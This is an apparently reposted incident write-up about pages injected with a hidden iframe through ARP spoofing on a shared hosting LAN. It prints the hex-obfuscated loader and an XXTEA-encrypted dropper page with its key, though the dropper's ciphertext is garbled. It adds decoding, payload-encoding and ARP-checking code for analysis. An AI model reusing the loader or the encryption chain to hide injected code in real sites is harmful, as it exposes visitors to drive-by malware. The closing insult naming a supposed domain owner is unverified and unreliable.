Hexadecimal escape obfuscation: the code is decoded automatically when the JavaScript runs.

Source: Internet
Author: User

Checking the page source at the time showed that a line had been added at the top of the page: <script src=http://1.520sb.cn/1.js></script>
But this code only shows up intermittently.
I thought the server had been attacked or infected with a virus.
I checked all the affected pages and related files:
nothing abnormal was found,
and no trace of an intrusion was found on the server.

Downloading the js file to a local machine shows the following code:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a\x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x31\x2e\x6a\x70\x67\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a\x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x32\x2e\x6a\x70\x67\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");

The \xNN sequences are ordinary hexadecimal escapes, so the JavaScript engine decodes them automatically when the script runs; the obfuscation only hides the strings from a casual reading of the source and from simple keyword searches for things like "iframe". Once the script tag has been inserted, the code runs as soon as the page is opened. Decoded, the three statements are document.writeln calls that print the following into the page:
window["document"]["writeln"]("<DIV style=\"CURSOR:url('http://1.520sb.cn/ma/1.jpg')\">");
window["document"]["writeln"]("<DIV style=\"CURSOR:url('http://1.520sb.cn/ma/2.jpg')\"></DIV></DIV>");
window["document"]["writeln"]("<iframe src=http://1.520sb.cn/tj.htm width=0 height=0></iframe>");
The first two lines set a CSS cursor that points at a remote file served under a .jpg name; the third loads http://1.520sb.cn/tj.htm in a 0x0 iframe, which the visitor never sees.
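The decoding above was done by hand. As an added example, not code from the original post, the block below does the same job without giving the loader a real page: it undoes the \xNN escapes statically for reading, runs the loader against a stand-in `window` whose document.write/writeln only record what they are asked to write, and pulls the URLs out of the captured HTML. The loader text is constructed here to match the shape of the page's 1.js; nothing is fetched from 1.520sb.cn. Neither new Function() nor Node's vm module is a security boundary, so run unknown scripts this way only on a disposable analysis machine.

```javascript
// Added example, not code from the original post. The loader below is a
// constructed stand-in with the same shape as the page's 1.js.
const LOADER = String.raw`window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a\x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x31\x2e\x6a\x70\x67\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a\x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x32\x2e\x6a\x70\x67\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");`;

// Stage 1: static decode of the \xNN escapes (and \/ \' \") for reading only.
// The result is the loader as a human would print it, not valid JS to re-run,
// because the escaped quotes inside the string literals are unescaped too.
function decodeHexEscapes(src) {
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)))
    .replace(/\\(['"\/])/g, '$1');
}

// Stage 2: execute the loader with a recording stand-in for window.document.
// The loader reaches the outside world only through `window`, and the
// function parameter shadows the real one. This is containment for a known,
// tiny loader, not a sandbox (see the note above).
function captureWrites(src) {
  const writes = [];
  const fakeWindow = {
    document: {
      write: (s) => { writes.push(String(s)); },
      writeln: (s) => { writes.push(String(s) + '\n'); },
    },
  };
  new Function('window', src)(fakeWindow);
  return writes;
}

// Stage 3: indicators from the captured HTML: iframe/script src= values and
// CSS url() references, which is where this loader hides its next stage.
function extractUrls(html) {
  const re = /(?:src|url)\s*[=(]?\s*['"]?\s*(https?:\/\/[^\s'")<>]+)/gi;
  const found = new Set();
  let m;
  while ((m = re.exec(html)) !== null) found.add(m[1]);
  return [...found];
}

function analyzeLoader(src) {
  const writes = captureWrites(src);
  return { readable: decodeHexEscapes(src), writes, urls: extractUrls(writes.join('')) };
}
```

analyzeLoader(LOADER) returns the readable source, the three strings the loader would have written into the page, and the three URLs to block or look up. Replacing document.write with a recorder is the general trick for loaders of this family: whatever decoding they do, the output has to pass through a DOM sink, and that sink is under your control.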

Http://1.520sb.cn/ma/1.jpg and valve

The content of http://1.520sb.cn/mm/06014.htm is:
<script language=javascript>
function utf8to16(str) {
  // Turn a string of UTF-8 bytes (one character per byte) into UTF-16 text
  var out, i, len, c;
  var char2, char3;
  out = [];
  len = str.length;
  i = 0;
  while (i < len) {
    c = str.charCodeAt(i++);
    switch (c >> 4) {
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
        // 0xxxxxxx: one-byte sequence
        out[out.length] = str.charAt(i - 1);
        break;
      case 12: case 13:
        // 110xxxxx 10xxxxxx: two-byte sequence
        char2 = str.charCodeAt(i++);
        out[out.length] = String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
        break;
      case 14:
        // 1110xxxx 10xxxxxx 10xxxxxx: three-byte sequence
        char2 = str.charCodeAt(i++);
        char3 = str.charCodeAt(i++);
        out[out.length] = String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
        break;
    }
  }
  return out.join('');
}
// Reverse lookup table: ASCII code -> 6-bit base64 value, -1 for bytes outside the alphabet
var base64DecodeChars = new Array(
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
  52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
  -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
  15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
  -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
  41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
function base64decode(str) {
  // Standard base64 decode; '=' (61) ends the data, bytes outside the alphabet are skipped
  var c1, c2, c3, c4;
  var i, len, out;
  len = str.length;
  i = 0;
  out = "";
  while (i < len) {
    do {
      c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c1 == -1);
    if (c1 == -1) break;
    do {
      c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c2 == -1);
    if (c2 == -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 == 61) return out;
      c3 = base64DecodeChars[c3];
    } while (i < len && c3 == -1);
    if (c3 == -1) break;
    out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 == 61) return out;
      c4 = base64DecodeChars[c4];
    } while (i < len && c4 == -1);
    if (c4 == -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}
function long2str(v, w) {
  // Little-endian 32-bit words -> byte string; with w, the last word holds the real length
  var vl = v.length;
  var sl = v[vl - 1] & 0xffffffff;
  for (var i = 0; i < vl; i++) {
    v[i] = String.fromCharCode(v[i] & 0xff, v[i] >>> 8 & 0xff, v[i] >>> 16 & 0xff, v[i] >>> 24 & 0xff);
  }
  if (w) {
    return v.join('').substring(0, sl);
  } else {
    return v.join('');
  }
}
function str2long(s, w) {
  // Byte string -> little-endian 32-bit words; with w, the byte length is appended as a final word
  var len = s.length;
  var v = [];
  for (var i = 0; i < len; i += 4) {
    v[i >> 2] = s.charCodeAt(i) | s.charCodeAt(i + 1) << 8 | s.charCodeAt(i + 2) << 16 | s.charCodeAt(i + 3) << 24;
  }
  if (w) {
    v[v.length] = len;
  }
  return v;
}
function xxtea_decrypt(str, key) {
  // XXTEA block cipher, decrypt direction; the key is used as-is, so 'fuck' is a single 32-bit word
  if (str == "") {
    return "";
  }
  var v = str2long(str, false);
  var k = str2long(key, false);
  var n = v.length - 1;
  var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
  var mx, e, q = Math.floor(6 + 52 / (n + 1)), sum = q * delta & 0xffffffff;
  while (sum != 0) {
    e = sum >>> 2 & 3;
    for (var p = n; p > 0; p--) {
      z = v[p - 1];
      mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
      y = v[p] = v[p] - mx & 0xffffffff;
    }
    z = v[n];
    mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
    y = v[0] = v[0] - mx & 0xffffffff;
    sum = sum - delta & 0xffffffff;
  }
  return long2str(v, true);
}
// base64-encoded XXTEA ciphertext
t = "samples/Y74mVvPn26A0t/samples/rnNED15lBZ + samples/samples + mgNUlhUXA4 + iyLe + coding ++ 0kv/samples + VYhbnt9c/wnraw.gq/samples + h + response/response + response/aro7aQyiSFeOa8H 8h/0 + response + 17fOGiKU9L + response/response + response/P5lp3G/response + NlF3rCuf9eEw + 3L/response/ hhhK3YeGMPaO6uJlFkmLroHoZnYAi1/oDNGziqc61FE2m/large ";
t = utf8to16(xxtea_decrypt(base64decode(t), 'fuck'));
document.write(t);
</script>
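The page above chains base64, XXTEA with the key 'fuck', and a UTF-8 decode before handing the result to document.write, so the real HTML never appears in the source. The block below is an added example, not the page's code: an offline version of that chain for Node, with the encrypt half included so a constructed blob can be round-tripped (the page's own ciphertext did not survive extraction, so the sample HTML is constructed). Node's Buffer stands in for the hand-written base64decode() and utf8to16(); the XXTEA core is the same word-wise algorithm reimplemented here. The function names, the zero-padded key handling and the length check in long2str() are mine and are explained in the comments.

```javascript
// Added example, not code from the original post. Requires Node (Buffer).
const DELTA = 0x9E3779B9;

// Byte string -> little-endian 32-bit words (the page's str2long). Missing
// trailing bytes are zero; with appendLength the byte count is stored as a
// final word so the decryptor can strip the padding again.
function str2long(s, appendLength) {
  const byteAt = (i) => (i < s.length ? s.charCodeAt(i) & 0xff : 0);
  const v = [];
  for (let i = 0; i < s.length; i += 4) {
    v[i >> 2] = byteAt(i) | byteAt(i + 1) << 8 | byteAt(i + 2) << 16 | byteAt(i + 3) << 24;
  }
  if (appendLength) v.push(s.length);
  return v;
}

// Words -> byte string (the page's long2str). With trustLength the last word
// is read as the plaintext length; a value outside the only possible range
// means the key was wrong or the blob is corrupt. The page's script skips
// this check and would hand garbage to document.write instead.
function long2str(v, trustLength) {
  const bytes = [];
  for (const w of v) bytes.push(w & 0xff, w >>> 8 & 0xff, w >>> 16 & 0xff, w >>> 24 & 0xff);
  const s = String.fromCharCode(...bytes);
  if (!trustLength) return s;
  const n = (v.length - 1) << 2;
  const len = v[v.length - 1] >>> 0;
  if (len > n || len < n - 3) return null;
  return s.substring(0, len);
}

// The page's script uses the 4-byte key as-is: str2long gives one word and
// k[1..3] read as undefined, which `undefined ^ z` treats as 0. Padding with
// zero words is the explicit equivalent, so blobs from that tooling decrypt.
function keyWords(key) {
  const k = str2long(key, false);
  while (k.length < 4) k.push(0);
  return k;
}

function mx(sum, y, z, p, e, k) {
  return (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
}

function xxteaEncrypt(str, key) {
  if (str === '') return '';
  const v = str2long(str, true), k = keyWords(key), n = v.length - 1;
  let z = v[n], y, sum = 0, e, p;
  let q = Math.floor(6 + 52 / (n + 1));
  while (q-- > 0) {
    sum = sum + DELTA & 0xffffffff;
    e = sum >>> 2 & 3;
    for (p = 0; p < n; p++) {
      y = v[p + 1];
      z = v[p] = v[p] + mx(sum, y, z, p, e, k) & 0xffffffff;
    }
    y = v[0];
    z = v[n] = v[n] + mx(sum, y, z, p, e, k) & 0xffffffff;
  }
  return long2str(v, false);
}

function xxteaDecrypt(str, key) {
  if (str === '') return '';
  const v = str2long(str, false), k = keyWords(key), n = v.length - 1;
  let z, y = v[0], e, p;
  let sum = Math.floor(6 + 52 / (n + 1)) * DELTA & 0xffffffff;
  while (sum !== 0) {
    e = sum >>> 2 & 3;
    for (p = n; p > 0; p--) {
      z = v[p - 1];
      y = v[p] = v[p] - mx(sum, y, z, p, e, k) & 0xffffffff;
    }
    z = v[n];
    y = v[0] = v[0] - mx(sum, y, z, p, e, k) & 0xffffffff;
    sum = sum - DELTA & 0xffffffff;
  }
  return long2str(v, true);
}

// The page's pipeline, t = utf8to16(xxtea_decrypt(base64decode(t), key)),
// and its inverse. Returns null instead of garbage when the key is wrong.
function decodePayload(blobB64, key) {
  const plain = xxteaDecrypt(Buffer.from(blobB64, 'base64').toString('latin1'), key);
  return plain === null ? null : Buffer.from(plain, 'latin1').toString('utf8');
}

function encodePayload(html, key) {
  const cipher = xxteaEncrypt(Buffer.from(html, 'utf8').toString('latin1'), key);
  return Buffer.from(cipher, 'latin1').toString('base64');
}

// Constructed sample standing in for the page's unrecoverable blob: the kind
// of HTML a dropper page like 06014.htm decodes, with a non-ASCII comment so
// the UTF-8 step is exercised.
const SAMPLE_HTML = '<iframe src=http://1.520sb.cn/tj.htm width=0 height=0></iframe><!-- 统计 -->';
const SAMPLE_BLOB = encodePayload(SAMPLE_HTML, 'fuck');
```

decodePayload(blob, 'fuck') gives back the HTML a page like 06014.htm would write, without a browser and without document.write ever running. The key is not secret in any useful sense: it sits in the same script as the ciphertext, so the layer only defeats scanners that look for literal iframe strings, not an analyst who copies the functions out.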

Recorded here for reference.
I did not find any sign that the server settings had been changed or that it had been infiltrated. I searched for 520sb online, and someone said: "This has nothing to do with what you describe. It is a kind of ARP sniffer: packets sent to the gateway are hijacked, mainly because a computer on the intranet has been compromised and inserts content through ARP spoofing, even into plain HTML pages. Because ARP attacks are unstable, the hijacking success rate varies.
Haha, this was the cause the last time a customer ran into it. Reinstalling the system is useless; finding that computer is the key."
Http://www.im286.com/archiver/tid-1886972.html
Http://linux.chinaunix.net/bbs/thread-886420-4-1.html
In other words, it is a problem on the server's LAN.
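The conclusion above points at the LAN, and the quickest confirmation from the server itself is its ARP cache. As an added practitioner check, not part of the original post, the block below parses a Windows `arp -a` listing and flags the two signs of the hijack just described: the gateway resolving to a MAC other than the one on record, and one MAC answering for several IP addresses. The listing, the gateway IP and the known-good gateway MAC are constructed for the example; on a real host, compare against the gateway MAC the hosting provider gives you.

```javascript
// Added example, not code from the original post.
const GATEWAY_IP = '192.168.1.1';              // assumed gateway address
const KNOWN_GATEWAY_MAC = 'aa-bb-cc-dd-ee-01'; // assumed value from the provider's records

// Constructed `arp -a` output (Windows format) showing a poisoned cache:
// the gateway and another host both resolve to 00-11-22-33-44-55.
const SAMPLE_ARP_OUTPUT = `
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.23          00-11-22-33-44-55     dynamic
  192.168.1.40          aa-bb-cc-dd-ee-40     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
`;

// Parse the "ip  mac  type" rows; header and interface lines do not match.
function parseArpTable(text) {
  const re = /^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)/i;
  const rows = [];
  for (const line of text.split(/\r?\n/)) {
    const m = re.exec(line);
    if (m) rows.push({ ip: m[1], mac: m[2].toLowerCase(), type: m[3].toLowerCase() });
  }
  return rows;
}

// Two checks: the gateway's MAC against the recorded one, and any unicast MAC
// that claims more than one IP (broadcast and IPv4 multicast entries are
// legitimately shared and are skipped).
function findArpSpoofSigns(rows, gatewayIp, knownGatewayMac) {
  const findings = [];
  const gw = rows.find((r) => r.ip === gatewayIp);
  if (!gw) {
    findings.push(`gateway ${gatewayIp} not in ARP cache`);
  } else if (gw.mac !== knownGatewayMac.toLowerCase()) {
    findings.push(`gateway ${gatewayIp} resolves to ${gw.mac}, expected ${knownGatewayMac}`);
  }
  const byMac = new Map();
  for (const r of rows) {
    if (r.mac === 'ff-ff-ff-ff-ff-ff' || r.mac.startsWith('01-00-5e')) continue;
    byMac.set(r.mac, [...(byMac.get(r.mac) || []), r.ip]);
  }
  for (const [mac, ips] of byMac) {
    if (ips.length > 1) findings.push(`${mac} claims ${ips.length} addresses: ${ips.join(', ')}`);
  }
  return findings;
}
```

A static binding of the gateway's IP to its real MAC, which is what the provider's tool does, stops the server from accepting the forged replies; it does nothing for the other hosts on the segment, which is why the provider still has to find the machine that is sending them.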

I remembered the small tool HiChina provides to bind the gateway IP address to its MAC address as a defence against ARP spoofing. After downloading and running it, the program reported that the binding had succeeded,
but after refreshing the website the injected virus code was still there.

I called HiChina and got a definite answer: it is indeed ARP spoofing. They will check the problem host next Monday, and in the meantime they told me to download their MAC binding tool, which is the same small program I had already run, and to restart it and try again.

So far the problem seems to have been resolved; the notes above are kept for reference.

Since this blog is hosted on the same server, anyone who visited it this week should update their anti-virus software promptly and run a scan. I apologize for any damage this may have caused.

PS: The owner of the domain name 520sb.cn is an sb named Niu Xiaopan; you can look the domain up yourself.

The content of this page comes from the Internet and does not represent Alibaba Cloud's opinion; the products and services mentioned on the page have no relationship with Alibaba Cloud.